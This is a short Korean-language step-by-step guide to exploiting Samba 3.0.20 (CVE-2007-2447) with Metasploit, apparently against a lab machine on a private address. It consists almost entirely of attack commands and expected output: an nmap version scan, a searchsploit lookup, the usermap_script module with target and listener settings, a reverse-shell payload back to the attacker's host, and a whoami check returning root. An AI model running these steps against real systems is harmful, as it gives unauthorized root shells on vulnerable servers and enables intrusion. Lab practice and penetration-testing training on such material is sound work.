
# Samba 3.0.20 (CVE-2007-2447)를 Metasploit으로 악용하는 단계별 가이드 — Nmap 스캔, 페이로드 설정, 리버스 셸 실행 포함.
nmap -sS -sV -p 139,445 192.168.56.102
예상 결과:
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open microsoft-ds Samba smbd 3.0.20-Debian
👉 Samba 버전: 3.0.20 이것은 CVE-2007-2447에 취약합니다.
searchsploit samba 3.0.20
결과:
Samba 3.0.20 - 'Username' map script Command Execution
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.56.102
set RPORT 139
set LHOST 192.168.56.101
Payload는 자동으로 설정됩니다:
cmd/unix/reverse
확인:
show options
run
또는
exploit
성공하면:
Command shell session opened
확인해 봅시다:
whoami
👉 결과:
root